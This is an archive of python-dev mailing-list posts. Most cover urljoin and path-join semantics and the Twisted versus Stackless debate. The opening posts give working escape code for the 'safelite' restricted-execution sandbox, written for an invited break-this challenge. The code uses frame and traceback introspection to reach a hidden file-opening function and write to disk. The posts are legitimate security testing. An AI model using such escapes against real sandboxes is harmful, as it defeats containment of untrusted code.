Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
Another hole. Not as devious as some, but easy to fix with yet another
type check. And you probably want to get rid of "get_frame" from
safelite.

This trick notices 'buffering' is passed to open, which does an int
coerce of non-int objects. I can look up the stack frames and get
"open_file", which I can then use for whatever I want.

In this case, I used the hole to reimplement 'open' in its entirety.

import safelite

class GetAccess(object):
    def __init__(self, filename, mode, buffering):
        self.filename = filename
        self.mode = mode
        self.buffering = buffering
        self.f = None

    def __int__(self):
        # Get access to the calling frame.
        # (Strange that that function is available, but I
        # could do it the old-fashioned way and raise/
        # catch an exception)
        frame = safelite.get_frame(1)

        # Look at that nice function right there.
        open_file = frame.f_locals["open_file"]

        # Get around restricted mode
        locals_d = {}
        exec """
def breakout(open_file, filename, mode, buffering):
    return open_file(filename, mode, buffering)
""" in frame.f_globals, locals_d
        del frame

        # Call the function
        self.f = locals_d["breakout"](open_file, self.filename,
                                      self.mode, self.buffering)

        # Jump outta here
        raise TypeError

def open(filename, mode="r", buffering=0):
    get_access = GetAccess(filename, mode, buffering)
    try:
        safelite.FileReader("whatever", "r", get_access)
    except TypeError:
        return get_access.f

f = open("busted.txt", "w")
f.write("Broke out of jail!\n")
f.close()

print "Message is:", repr(open("busted.txt").read())


Andrew Dalke
da...@dalkescientific.com


Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
tav 
> But the challenge was about doing `from safelite import FileReader`.

Though it doesn't say so in the first post in this thread, nor on your page at
  http://tav.espians.com/a-challenge-to-break-python-security.html

It says "Now find a way to write to the filesystem from your
interpreter". Which is what I did.  Who's to say your final
implementation will be more secure ;)

But I see your point. Perhaps update the description for those
misguided souls like me?

> This is just a challenge to see if the model holds

I haven't been watching this discussion closely and I can't find
mention of this - is the goal to support only 2.x or also support
Python 3? Your model seems to assume 2.x only, and there may be 3.x
attacks that aren't considered in the challenge.

For example, in Python 3 I would use the __traceback__ attribute of the
exception object to reach in and get the open function.  That seems
morally equivalent to what I did.

I hacked out the parts of safelite.py which wouldn't work in Python 3.
Following is a variation on the theme.

import safelite

try:
    safelite.FileReader("/dev/null", "r", "x")
except TypeError as err:
    frame = err.__traceback__.tb_next.tb_frame
    frame.f_locals["open_file"]("test.txt", "w").write("done.")


> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
> * f_code
> * f_builtins
> * f_globals
> * f_locals

which of course would make the above no longer work.

Cheers,

Andrew
da...@dalkescientific.com


Re: [Python-Dev] Challenge: Please break this! [Now with blog post]

2009-02-24 Thread Andrew Dalke
On Tue, Feb 24, 2009 at 3:05 PM, tav  wrote:
> And instead of trying to make tb_frame go away, I'd like to add the
> following to my proposed patch of RESTRICTED attributes:
>
> * f_code
> * f_builtins
> * f_globals
> * f_locals
>
> That seems to do the trick...

A goal is to use this in App Engine, yes? Which uses cgitb to report
errors? Which needs these restricted frame attributes to report the
values of variables when the error occurred?
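
To make that concrete, here's a small self-contained sketch - my own
example, nothing from App Engine - of cgitb reading frame attributes:

import cgitb
import sys

def boom():
    secret = "local state cgitb wants to display"
    return 1 / 0

try:
    boom()
except ZeroDivisionError:
    # cgitb.text() walks the traceback and reads each frame's
    # f_locals/f_globals to render variable values; restrict those
    # attributes and this report can no longer show 'secret'.
    print cgitb.text(sys.exc_info())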

Andrew Dalke
da...@dalkescientific.com


Re: [Python-Dev] Path object design

2006-11-03 Thread Andrew Dalke
glyph:
> Path manipulation:
>
>  * This is confusing as heck:
>>>> os.path.join("hello", "/world")
>'/world'
>>>> os.path.join("hello", "slash/world")
>'hello/slash/world'
>>>> os.path.join("hello", "slash//world")
>'hello/slash//world'
>Trying to formulate a general rule for what the arguments to os.path.join
> are supposed to be is really hard.  I can't really figure out what it would
> be like on a non-POSIX/non-win32 platform.

Made trickier by the similar yet different behaviour of urlparse.urljoin.

 >>> import urlparse
 >>> urlparse.urljoin("hello", "/world")
 '/world'
 >>> urlparse.urljoin("hello", "slash/world")
 'slash/world'
 >>> urlparse.urljoin("hello", "slash//world")
 'slash//world'
 >>>

It does not make sense to me that these should be different.

   Andrew
   [EMAIL PROTECTED]

[Apologies to glyph for the dup; mixed up the reply-to.  Still getting
used to gmail.]


Re: [Python-Dev] Path object design

2006-11-03 Thread Andrew Dalke
Martin:
> Just in case this isn't clear from Steve's and Fredrik's
> post: The behaviour of this function is (or should be)
> specified, by an IETF RFC. If somebody finds that non-intuitive,
> that's likely because their mental model of relative URIs
> deviates from the RFC's model.

I didn't realize that urljoin is only supposed to be used
with a base URL, where "base URL" (the term used in the docstring)
carries the specific requirement that it be absolute.

I instead saw the word "join" and figured it should do roughly
the same thing as os.path.join.


>>> import urlparse
>>> urlparse.urljoin("file:///path/to/hello", "slash/world")
'file:///path/to/slash/world'
>>> urlparse.urljoin("file:///path/to/hello", "/slash/world")
'file:///slash/world'
>>> import os
>>> os.path.join("/path/to/hello", "slash/world")
'/path/to/hello/slash/world'
>>>

It does not.  My intuition, nowadays highly influenced by URLs, is that
with a couple of hypothetical functions for going between filenames and URLs:

os.path.join(absolute_filename, filename)
    ==
file_url_to_filename(urlparse.urljoin(
    filename_to_file_url(absolute_filename),
    filename_to_file_url(filename)))

which is not the case.  os.path.join assumes the base is a directory
name when used in a join, "inserting '/' as needed", while RFC
1808 says

   The last segment of the base URL's path (anything
   following the rightmost slash "/", or the entire path if no
   slash is present) is removed

Is my intuition wrong in thinking those should be the same?

I suspect it is. I've been very glad that when I ask for a directory
name that I don't need to check that it ends with a "/".  Urljoin's
behaviour is correct for what it's doing.  os.path.join is better for
what it's doing.  (And about once a year I manually verify the
difference because I get unsure.)

I think these should not share the "join" in the name.

If urljoin is not meant for relative base URLs, should it
raise an exception when misused? Hmm, though the RFC
algorithm does not have a failure mode and the result may
be a relative URL.
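
A sketch of what such a check could look like - strict_urljoin is my
own name, not a proposed API:

import urlparse

def strict_urljoin(base, url):
    # refuse a relative base, which (as I now know) urljoin
    # was never meant to accept
    if not urlparse.urlsplit(base)[0]:
        raise ValueError("base URI %r is not absolute" % base)
    return urlparse.urljoin(base, url)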

Consider

>>> urlparse.urljoin("http://blah.com/a/b/c", "..")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../")
'http://blah.com/a/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../..")  # What?!
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../../")
'http://blah.com/../../'
>>>


> Of course, there is also the chance that the implementation
> deviates from the RFC; that would be a bug.

The comment in urlparse

# XXX The stuff below is bogus in various ways...

is ever so reassuring.  I suspect there's a bug given the
previous code.  Or I've a bad mental model.  ;)

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Steve:
> > I'm darned if I know. I simply know that it isn't right for http resources.

/F:
> the URI specification disagrees; an URI that starts with "../" is per-
> fectly legal, and the specification explicitly states how it should be
> interpreted.

I have looked at the spec, and can't figure out how its explanation
matches the observed urljoin results.  Steve's excerpt trimmed out
the strangest example.

>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../..")  # What?!
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/a/b/c", "../../../../")
'http://blah.com/../../'
>>>

> (it's important to realize that "urijoin" produces equivalent URI:s, not
> file names)

Both, though, are "paths".  The OP, Mike Orr, wrote:

   I agree that supporting non-filesystem directories (zip files,
   CSV/Subversion sandboxes, URLs) would be nice, but we already have a
   big enough project without that.  What constraints should a Path
   object keep in mind in order to be forward-compatible with this?

Is the answer therefore that URLs and URI behaviour should not
place constraints on a Path object because they are sufficiently
dissimilar from file-system paths?  Do these other non-FS hierarchical
structures have similar differences causing a semantic mismatch?

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Martin:
> Unfortunately, you didn't say which of these you want explained.
> As it is tedious to write down even a single one, I restrain to the
> one with the What?! remark.
>
>  urlparse.urljoin("http://blah.com/a/b/c", "../../../..")  # What?!
>  'http://blah.com/'

The "What?!" is in context with the previous and next entries.  I've
reduced it to a simpler case

>>> urlparse.urljoin("http://blah.com/", "..")
'http://blah.com/'
>>> urlparse.urljoin("http://blah.com/", "../")
'http://blah.com/../'
>>> urlparse.urljoin("http://blah.com/", "../..")
'http://blah.com/'

Does the result make sense to you?  Does it make
sense that the last of these is shorter than the middle
one?  It sure doesn't to me.  I thought it was obvious
that there was an error; obvious enough that I didn't
bother to track down why - especially as my main point
was to argue there are different ways to deal with
hierarchical/path-like schemes, each correct for its
given domain.

> Please follow me through section 5 of
>
> http://www.ietf.org/rfc/rfc3986.txt

The core algorithm causing the "what?!" comes from
"remove_dot_segments", section 5.2.4.  In parallel my
3 cases should give:

5.2.4 Remove Dot Segments
  remove_dot_segments("/..")    r_d_s("/../")           r_d_s("/../..")

  1. I = "/.."                  I = "/../"              I = "/../.."
     O = ""                     O = ""                  O = ""
  2A. (does not apply)          2A. (does not apply)    2A. (does not apply)
  2B. (does not apply)          2B. (does not apply)    2B. (does not apply)
  2C. O="" I="/"                2C. O="" I="/"          2C. O="" I="/.."
  2A. (does not apply)          2A. (does not apply)    .. reduces to r_d_s("/..")
  2B. (does not apply)          2B. (does not apply)    3. Result: "/"
  2C. (does not apply)          2C. (does not apply)
  2D. (does not apply)          2D. (does not apply)
  2E. O="/", I=""               2E. O="/", I=""
  3. Result: "/"                3. Result: "/"

My reading of the RFC 3986 says all three examples should
produce the same result.  The fact that my "what?!" comment happens
to be correct according to that RFC is purely coincidental.
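
For reference, here is a direct transcription of remove_dot_segments
from RFC 3986 section 5.2.4 - a sketch I wrote to check the traces
above, not code from urlparse or any library:

def remove_dot_segments(path):
    output = ""
    while path:
        if path.startswith("../"):                       # 2A
            path = path[3:]
        elif path.startswith("./"):                      # 2A
            path = path[2:]
        elif path.startswith("/./"):                     # 2B
            path = "/" + path[3:]
        elif path == "/.":                               # 2B
            path = "/"
        elif path.startswith("/../") or path == "/..":   # 2C
            if path == "/..":
                path = "/"
            else:
                path = "/" + path[4:]
            # remove the last segment from the output buffer
            i = output.rfind("/")
            if i >= 0:
                output = output[:i]
            else:
                output = ""
        elif path in (".", ".."):                        # 2D
            path = ""
        else:                                            # 2E
            # move the first segment (with its leading "/") to output
            i = path.find("/", 1)
            if i == -1:
                output += path
                path = ""
            else:
                output += path[:i]
                path = path[i:]
    return output

for p in ("/..", "/../", "/../.."):
    print repr(p), "->", repr(remove_dot_segments(p))   # all three give '/'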

Then again, urlparse.py does *not* claim to be RFC 3986 compliant.
The module docstring is

"""Parse (absolute and relative) URLs.

See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.
"""

I tried the same code with 4Suite, which does claim compliance, and got

>>> import Ft
>>> from Ft.Lib import Uri
>>> Uri.Absolutize("..", "http://blah.com/")
'http://blah.com/'
>>> Uri.Absolutize("../", "http://blah.com/")
'http://blah.com/'
>>> Uri.Absolutize("../..", "http://blah.com/")
'http://blah.com/'
>>>

The text of its Uri.py says

"""
This function is similar to urlparse.urljoin() and urllib.basejoin().
Those functions, however, are (as of Python 2.3) outdated, buggy, and/or
designed to produce results acceptable for use with other core Python
libraries, rather than being earnest implementations of the relevant
specs. Their problems are most noticeable in their handling of
same-document references and 'file:' URIs, both being situations that
come up far too often to consider the functions reliable enough for
general use.
"""
# Reasons to avoid using urllib.basejoin() and urlparse.urljoin():
# - Both are partial implementations of long-obsolete specs.
# - Both accept relative URLs as the base, which no spec allows.
# - urllib.basejoin() mishandles the '' and '..' references.
# - If the base URL uses a non-hierarchical or relative path,
#or if the URL scheme is unrecognized, the result is not
#always as expected (partly due to issues in RFC 1808).
# - If the authority component of a 'file' URI is empty,
#the authority component is removed altogether. If it was
#not present, an empty authority component is in the result.
# - '.' and '..' segments are not always collapsed as well as they
#should be (partly due to issues in RFC 1808).
# - Effective Python 2.4, urllib.basejoin() *is* urlparse.urljoin(),
#but urlparse.urljoin() is still based on RFC 1808.

In searching the archives
  http://mail.python.org/pipermail/python-dev/2005-September/056152.html

Fabien Schwob:
> I'm using the module urlparse and I think I've found a bug in the
> urlparse module. When you merge an url and a link
> like"../../../page.html" with urljoin, the new url created keep some
> "../" in it. Here is an example :
>
>  >>> import urlparse
>  >>> begin = "http://www.example.com/folder/page.html"
>  >>> end = "../../../otherpage.html"
>  >>> urlparse.urljoin(begin, end)
> 'http://www.example.com/../../otherpage.html'

Guido:
> You shouldn't be giving more "../" sequences than are possible. I find
> the current behavior acceptable.

(Apparently for RFC 1808 that's a valid answer; it was an implementation
choice in how to handle that case.)

While not directly relevant, postings like John J Lee's
 http://mail.python.org/pipermail/python-bugs-lis

Re: [Python-Dev] Path object design

2006-11-05 Thread Andrew Dalke
Me [Andrew]:
> > As this is not a bug, I have added the feature request 1591035 to SF
> > titled "update urlparse to RFC 3986".  Nothing else appeared to exist
> > on that specific topic.

Martin:
> Thanks. It always helps to be more specific; being less specific often
> hurts.

So does being more specific.  I wasn't trying to report a bug in
urlparse.  I figured everyone knew the problems existed.  The code
comments say so and various back discussions on this list say so.

All I wanted to do was point out that two seemingly similar problems -
path traversal of hierarchical structures - had two different expected
behaviors.  Now I've spent entirely too much time on specifics I didn't
care about and didn't think were important.

I've also been known to do the full report and have people ignore what
I wrote because it was too long.

> I find there is a difference between "urllib behaves
> non-intuitively" and "urllib gives result A for parameters B and C,
> but should give result D instead". Can you please add specific examples
> to your report that demonstrate the difference between implemented
> and expected behavior?

No.

I consider the "../" cases to be unimportant edge cases and
I would rather people fixed the other problems highlighted in the
text I copied from 4Suite's Uri.py -- like improperly allowing a
relative URL as the base url, which I incorrectly assumed was
legit - and that others have reported on python-dev, easily found
with Google.

If I only add test cases for "../" then I believe that that's all that
will be fixed.

Given the back history of this problem and lack of followup I
also believe it won't be fixed unless someone develops a brand
new module, from scratch, which will be added to some future
Python version.  There's probably a compliance suite out there
to use for this sort of task.  I hadn't bothered to look, as I am
no more proficient at Google searches than others here.

Finally, I see that my report is a dup.  SF search is poor.  As
Nick Coghlan reported, Paul Jimenez has a replacement for urlparse.
Summarized in
 http://www.python.org/dev/summary/2006-04-01_2006-04-15/
It was submitted in spring as a patch - SF# 1462525 at
  
http://sourceforge.net/tracker/index.php?func=detail&aid=1462525&group_id=5470&atid=305470
which I didn't find in my earlier searching.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Path object design

2006-11-06 Thread Andrew Dalke
Martin:
> It still should be possible to come up with examples for these as
> well, no? For example, if you pass a relative URI as the base
> URI, what would you like to see happen?

Until two days ago I didn't even realize that was an incorrect
use of urljoin.  I can't be the only one.  Hence, raise an
exception - just like 4Suite's Uri.py does.

> That's true. Actually, it's probably not true; it will only get fixed
> if some volunteer contributes a fix.

And it's not I.  A true fix is a lot of work.  I would rather use Uri.py,
now that I see it handles everything I care about, and then some.
Eg, file name <-> URI conversion.

> So do you think this patch meets your requirements?

# new
>>> uriparse.urljoin("http://spam/", "foo/bar")
'http://spam//foo/bar'
>>>

# existing
>>> urlparse.urljoin("http://spam/", "foo/bar")
'http://spam/foo/bar'
>>>

No.  That was the first thing I tried.  Also found

>>> urlparse.urljoin("http://blah", "/spam/")
'http://blah/spam/'
>>> uriparse.urljoin("http://blah", "/spam/")
'http://blah/spam'
>>>

I reported these on the patch page.  Nothing else strange
came up, but I did only try http urls and not the others.

My "requirements", meaning my vague, spur-of-the-moment thoughts
without any research or experimentation to determine their validity,
are different than those for Python.

My real requirements are met by the existing code.

My imagined ones include support for edge cases, the idna
codec, unicode, and real-world use on a variety of OSes.

4Suite's Uri.py seems to have this.  Eg, lots of edge-case
code like

# On Windows, ensure that '|', not ':', is used in a drivespec.
if os.name == 'nt' and scheme == 'file':
    path = path.replace(':','|',1)

Hence the uriparse.py patch does not meet my hypothetical
requirements.

Python's requirements are probably to get closer to the spec.
In which case yes, it's at least as good as and likely generally
better than the existing module, modulo a few API naming debates
and perhaps some rough edges which will be found when put into use.

And perhaps various arguments about how bug compatible it should be
and if the old code should be available as well as the new one,
for those who depend on the existing 1808-allowed implementation
dependent behavior.

For those I have not the experience to guide me and no care to push
the debate.  I've decided I'm going to experiment using 4Suite's Uri.py
for my code because it handles things I want which are outside of
the scope of uriparse.py

> This topic (URL parsing) is not only inherently difficult to
> implement, it is just as tedious to review. Without anybody
> reviewing the contributed code, it's certain that it will never
> be incorporated.

I have a different opinion.

Python's url manipulation code is a mess.  urlparse, urllib, urllib2.
Why is "urlencode" part of urllib and not urllib2?  For that matter,
urllib is labeled 'Open an arbitrary URL' and not 'and also do
manipulations on parts of URLs'.

I don't want to start fixing code because doing it the way I want to
requires a new API and a much better understanding of the RFCs
than I care about, especially since 4Suite and others have already
done this.

Hence I would say to just grab their library.  And perhaps update the
naming scheme.

Also, urlgrabber and pycURL are better for downloading arbitrary
URIs.  For some definitions of "better".

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Path object design

2006-11-06 Thread Andrew Dalke
Andrew:
> >>> urlparse.urljoin("http://blah.com/", "..")
> 'http://blah.com/'
> >>> urlparse.urljoin("http://blah.com/", "../")
> 'http://blah.com/../'
> >>> urlparse.urljoin("http://blah.com/", "../..")
> 'http://blah.com/'

/F:
> as I said, today's urljoin doesn't guarantee that the output is
> the *shortest* possible way to represent the resulting URI.

I didn't think anyone was making that claim.  The module claims
RFC 1808 compliance.  From the docstring:

DESCRIPTION
See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding,
UC Irvine, June 1995.

Now quoting from RFC 1808:

   5.2.  Abnormal Examples

   Although the following abnormal examples are unlikely to occur in
   normal practice, all URL parsers should be capable of resolving them
   consistently.  Each example uses the same base as above.

   An empty reference resolves to the complete base URL:

  <> = <URL:http://a/b/c/d;p?q#f>

   Parsers must be careful in handling the case where there are more
   relative path ".." segments than there are hierarchical levels in the
   base URL's path.

My claim is that "consistent" implies "in the spirit of the rest of the RFC"
and "to a human trying to make sense of the results", not merely
"does the same thing each time."  Else

>>> urljoin("http://blah.com/", "../../..")
'http://blah.com/there/were/too/many/dot-dot/path/elements/in/the/relative/url'

would be equally consistent.

>>> for rel in ".. ../ ../.. ../../ ../../.. ../../../ ../../../..".split():
...   print repr(rel), repr(urlparse.urljoin("http://blah.com/", rel))
...
'..' 'http://blah.com/'
'../' 'http://blah.com/../'
'../..' 'http://blah.com/'
'../../' 'http://blah.com/../../'
'../../..' 'http://blah.com/../'
'../../../' 'http://blah.com/../../../'
'../../../..' 'http://blah.com/../../'

I grant there is a consistency there.  It's not one most would have
predicted beforehand.

Then again, "should" is that wishy-washy "unless you've got a good
reason to do it a different way" sort of constraint.

Andrew
[EMAIL PROTECTED]


Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)

2007-02-15 Thread Andrew Dalke
I was the one on the Stackless list who last September or so
proposed the idea of monkeypatching and I'm including that
idea in my presentation for PyCon.  See my early rough draft
at http://www.stackless.com/pipermail/stackless/2007-February/002212.html
which contains many details about using Stackless, though
none on the Stackless implementation. (A lot on how to tie things together.)

So people know, I am an applications programmer and not a
systems programmer.  Things like OS-specific event mechanisms
annoy and frustrate me.  If I could do away with hardware and
still write useful programs I would.

I have tried 3 times to learn Twisted.  The first time I found
and reported various problems and successes.  See emails at
  http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/thread.html
The second time was to investigate a way to report upload
progress: http://twistedmatrix.com/trac/ticket/288
and the third was to compare Allegra and Twisted
  
http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

In all three cases I've found it hard to use Twisted because
the code didn't do as I expected it to do and when something
went wrong I got results which were hard to interpret.  I
believe others have similar problems, and this is one reason Twisted
is considered to be "a big, complicated, inseparable hairy mess."



I find the Stackless code also hard to understand.  Eg,
I don't know where the watchdog code is for the "run()"
command.  It uses several layers of macros and I haven't
been able to get it straight in my head.  However, so far
I've not run into strange errors in Stackless that I
have in Twisted.

I find the normal Python code relatively easy to understand.


Stackless only provides threadlets.  It does no I/O.
Richard Tew developed a "stacklesssocket" module which emulates
the API for the stdlib "socket" module.  I tweaked it a
bit and showed that by doing the monkeypatch

  import stacklesssocket
  import sys
  sys.modules["socket"] = stacklesssocket

then code like "urllib.urlopen" became Stackless compatible.
Eg, in my PyCon talk draft I show something like


import slib
# must monkeypatch before any other module imports "socket"
slib.use_monkeypatch()

import urllib2
import time
import hashlib

def fetch_and_reverse(host):
    t1 = time.time()
    s = urllib2.urlopen("http://"+host+"/").read()[::-1]
    dt = time.time() - t1
    digest = hashlib.md5(s).hexdigest()
    print "hash of %r/ = %s in %.2f s" % (host, digest, dt)

slib.main_tasklet(fetch_and_reverse)("www.python.org")
slib.main_tasklet(fetch_and_reverse)("docs.python.org")
slib.main_tasklet(fetch_and_reverse)("planet.python.org")
slib.run_all()

where the three fetches occur in parallel.

The choice of asyncore is, I think, done because 1) it
prevents needing an external dependency, 2) asyncore is
smaller and easier to understand than Twisted, and
3) it was for demo/proof of concept purposes.  While
tempting to improve that module I know that Twisted
has already gone though all the platform-specific crap
and I don't want to go through it again myself.  I don't
want to write a reactor to deal with GTK, and one for
OS X, and one for ...


Another reason I think Twisted is considered "tangled-up
Deep Magic, only for Wizards Of The Highest Order" is because
it's infused with event-based processing.  I've done a lot
of SAX processing and I can say that few people think that
way or want to go through the process of learning how.

Compare, for example, the following

  f = urllib2.urlopen("http://example.com/")
  for i, line in enumerate(f):
      print ("%06d" % i), repr(line)

with the normal equivalent in Twisted or other
async-based system.
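
Roughly, from memory - a sketch of the Twisted idiom of that era using
twisted.web.client.getPage, with details of error handling varying:

from twisted.internet import reactor
from twisted.web.client import getPage

def print_lines(body):
    # getPage delivers the whole body at once, as a string
    for i, line in enumerate(body.splitlines(True)):
        print ("%06d" % i), repr(line)

d = getPage("http://example.com/")
d.addCallback(print_lines)
d.addBoth(lambda ignored: reactor.stop())
reactor.run()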

Yet by using the Stackless socket monkeypatch, this
same code works in an async framework.  And the underlying
libraries have a much larger developer base than Twisted.
Want NNTP?  "import nntplib"  Want POP3?  "import poplib"
Plenty of documentation about them too.

On the Stackless mailing list I have proposed someone work
on a talk for EuroPython titled "Stackless and Twisted".
Andrew Francis has been looking into how to do that.

All the earlier quotes were lifted from glyph.  Here's another:
>  When you boil it down, Twisted's event loop is just a
>  notification for "a connection was made", "some data was
>  received on a connection", "a connection was closed", and
>  a few APIs to listen or initiate different kinds of
>  connections, start timed calls, and communicate with threads.
>  All of the platform details of how data is delivered to the
>  connections are abstracted away..  How do you propose we
>  would make a less "specific" event mechanism?

What would I need to do to extract this Twisted core so
I could replace asyncore?  I know at minimum I need
"twisted.internet" and "twisted.python" (the latter for
logging) and "twisted.persisted" for "styles.Ephemeral".

But I say this hesitantly recalling the frustrations
I had in dealing with a co

Re: [Python-Dev] Trial balloon: microthreads library in stdlib

2007-02-15 Thread Andrew Dalke
On 2/14/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote
in response to [EMAIL PROTECTED]:
> As far as I can tell, you still haven't even clearly expressed what your
> needs are, let alone whether or not Twisted is suitable.  In the reply
> you're citing, you said that "this" sounded like something "low level" that
> "twisted would be written on top of" - but the "this" you were talking
> about, based on your previous messages, sounded like monkeypatching the
> socket and asyncore modules to provide asynchronous file I/O based on the
> platform-specific IOCP API for Windows.

I don't know Richard's needs nor requirements.  I do know the mechanism
of the monkeypatch he's talking about.  I describe it a bit in my draft
for my Stackless talk at PyCon
  http://www.stackless.com/pipermail/stackless/2007-February/002212.html

It uses asyncore for the I/O and a scheduler which can figure out if
there are other running tasklets and how long is needed until the next
tasklet needs to wake up.
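
In outline, that scheduler looks something like this - a sketch of the
idea, not Richard's actual code:

import asyncore
import stackless

def run_reactor():
    # Alternate between letting ready tasklets run and polling
    # asyncore for network events; the real code also works out a
    # poll timeout from the next sleeper's wakeup time.
    while stackless.getruncount() > 1 or asyncore.socket_map:
        stackless.schedule()
        if asyncore.socket_map:
            asyncore.poll(0.05)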

Yes, this is another reactor.  Yes, it's not widely cross-platform.
Yes, it doesn't work with gtk and other GUI frameworks.  Yes,
as written it doesn't handle threads.

But also yes, it's a different style of writing reactors because of
how Stackless changes the control flow.

I and others would like to see something like the "stacklesssocket"
implemented on top of Twisted. Andrew Francis is looking into it
but I don't know to what degree of success he's had.  Err, looking
through the email archive, he has had some difficulties in doing
a Twisted/Stackless integration.  I don't think Twisted people
understand Stackless well enough (nor obviously he Twisted) or
what he's trying to do.

> >It is a large dependency and it is a secondary framework.
>
> Has it occurred to you that it is a "large" dependency not because we like
> making bloated and redundant code, but because it is doing something that is
> actually complex and involved?

Things like Twisted's support for NNTP, POP3, etc. aren't needed
with the monkeypatch approach because the standard Python
libraries will work, with Stackless and the underlying async library
collaborating under the covers.  So those parts of Twisted aren't
needed or relevant.

Twisted is, after all, many things.


> I thought that I provided several reasons before as well, but let me state
> them as clearly as I can here.  Twisted is a large and mature framework with
> several years of development and an active user community.  The pluggable
> event loop it exposes is solving a hard problem, and its implementation
> encodes a lot of knowledge about how such a thing might be done.  It's also
> tested on a lot of different platforms.
>
> Writing all this from scratch - even a small subset of it - is a lot of
> work, and is unlikely to result in something robust enough for use by all
> Python programs without quite a lot of effort.  It would be a lot easier to
> get the Twisted team involved in standardizing event-driven communications
> in Python.  Every other effort I'm aware of is either much smaller, entirely
> proprietary, or both.  Again, I would love to be corrected here, and shown
> some other large event-driven framework in Python that I was heretofore
> unaware of.

Sorry for the long quote; wasn't sure how to trim it.

I made this point elsewhere and above but feel it's important
enough to emphasize once more.

Stackless lets people write code which looks like blocking code
but which is not.  The blocking functions are forwarded to the
reactor, which does whatever it's supposed to do, and the results
returned.

Because most Python networking code will work unchanged
(assuming changes to the underlying APIs to work with
Stackless, as we hack now through monkeypatches), a
microthreads solution almost automatically and trivially gains
a large working code base, documentation, and active developer
base.

There does not need to be "some other large event-driven
framework in Python" because all that's needed is the 13kLOC
of reactor code from twisted.internet and not 140+kLOC in
all of Twisted.

>  Standardization is much easier to achieve when you have
> multiple interested parties with different interests to accommodate.  As
> Yitzhak Rabin used to say, "you don't engage in API standardization with
> your friends, you engage in API standardization with your enemies" - or...
> something like that.

I thought you made contracts even with -- or especially with -- your
friends regarding important matters so that both sides know what
they are getting into and so you don't become enemies in the future.

> You say that you weren't proposing an alternate implementation of an event
> loop core, so I may be reacting to something you didn't say at all.
>  However, again, at least Tristan thought the same thing, so I'm not the
> only one.

For demonstration (and for my case pedagogical reasons) we have
an event core loop.  I would rather pull out the parts I need from
Twisted.  I don't know how.  I don't

Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)

2007-02-15 Thread Andrew Dalke
> On Thu, 15 Feb 2007 10:46:05 -0500, "A.M. Kuchling" <[EMAIL PROTECTED]> wrote:
> >It's hard to debug the resulting problem.  Which level of the *12*
> >levels in the stack trace is responsible for a bug?  Which of the *6*
> >generic calls is calling the wrong thing because a handler was set up
> >incorrectly or the wrong object provided?  The code is so 'meta' that
> >it becomes effectively undebuggable.

On 2/15/07, Jean-Paul Calderone <[EMAIL PROTECTED]> wrote,
> I've debugged plenty of Twisted applications.  So it's not undebuggable. :)

Hence the word "effectively".  Or are you offering to be on-call
within 5 minutes for anyone wanting to debug code?  Not very
scalable, that.

The code I was talking about took me an hour to track down,
and I could only find the location by inserting a "print traceback"
call to figure out where I was.

> Application code tends to reside at the bottom of the call stack, so Python's
> traceback order puts it right where you're looking, which makes it easy to
> find.

As I also documented, Twisted tosses a lot of the call stack.  Here
is the complete and full error message I got:

Error: [Failure instance: Traceback (failure with no frames):
twisted.internet.error.ConnectionRefusedError: Connection was refused
by other side: 22: Invalid argument.
]

I wrote the essay at
  
http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html

to, among others, show just how hard it is to figure things
out in Twisted.

>  For any bug which causes something to be set up incorrectly and only
> later manifests as a traceback, I would posit that whether there is 1 frame or
> 12, you aren't going to get anything useful out of the traceback.

I posit that tracebacks are useful.

Consider:

def blah():
  make_network_request("A")
  make_network_request("B")

where "A" and "B" are encoded as part of a HTTP POST payload
to the same URI.

If there's an error in the network connection - eg, the implementation
for "B" on the server dies so the connection closes w/o a response -
then knowing that the call for "B" failed and not "A" is helpful
during debugging.

The low level error message cannot report that.  Yes, I could put
my own try blocks around everything and contextualize all of the
error messages so they are semantically correct for the given
level of code.  But that I would be a lot of code, hard to test, and
not cost effective.

> Standard practice here is just to make exception text informative,
> I think,

If you want to think of it as "exception text" then consider that
the stack trace is "just" more text for the message.

>but this is another general problem with Python programs
> and event loops, not one specific to either Twisted itself or the
> particular APIs Twisted exposes.

The thread is "Twisted Isn't Specific", as a branch of a discussion
on microthreads in the standard library.  As someone experimenting
with Stackless and how it can be used on top of an async library
I feel competent enough to comment on the latter topic.

As someone who has seen the reverse Bozo bit set by Twisted
people on everyone who makes the slightest comment towards
using any other async library, and has documented evidence as
to just why one might do so, I also feel competent enough to
comment on the branch topic.

My belief is that there are too many levels of genericity in
Twisted.  This makes it hard for an outsider to come in and
use the system.  By "use" I include 1) understanding how the
parts go together, 2) diagnose problems and 3) adding new
features that Twisted doesn't support.

Life is trade offs.  A Twisted trade off is genericity at the
cost of understandability.  Remember, this is all my belief,
backed by examples where I did try to understand.  My
experience with other networking packages has been much
